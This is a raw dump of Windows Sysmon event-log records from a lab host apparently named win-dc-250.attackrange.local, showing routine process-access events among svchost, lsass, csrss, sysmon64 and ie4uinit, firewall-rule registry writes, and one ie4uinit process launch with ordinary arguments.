13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.998{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{49394B4B-880D-4B34-BB8B-CD65B5E3E971}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 13241300x800000000000000010172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{62A15BE1-F4AD-471E-A863-4C9178D1F246}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 10341000x800000000000000010171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.982{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.982{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.982{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.982{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.982{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.904{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.904{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.873{08A6967A-4288-6000-1000-000000009A01}11361460C:\Windows\system32\svchost.exe{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.873{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.857{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.857{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.857{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.857{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.857{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.857{08A6967A-4756-6000-1C05-000000009A01}30284340C:\Windows\System32\ie4uinit.exe{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ie4uinit.exe+2d19|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.863{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exe11.00.14393.2999 (rs1_release_inmarket.190520-1518)IE Per-User Initialization UtilityInternet ExplorerMicrosoft CorporationIE4UINIT.EXEC:\Windows\System32\ie4uinit.exe -ClearIconCacheC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=8450580ADC40581006B7233F2B2803EB,SHA256=DD7FE0DBD6BD3B66437C093B707D1B2CA8AC72E4671B88829A4327FA6B8A00BD,IMPHASH=A9F54FA8B3C0ECA158788E684C66CA9A{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe"C:\Windows\System32\ie4uinit.exe" -UserConfig 10341000x800000000000000010860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.498{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 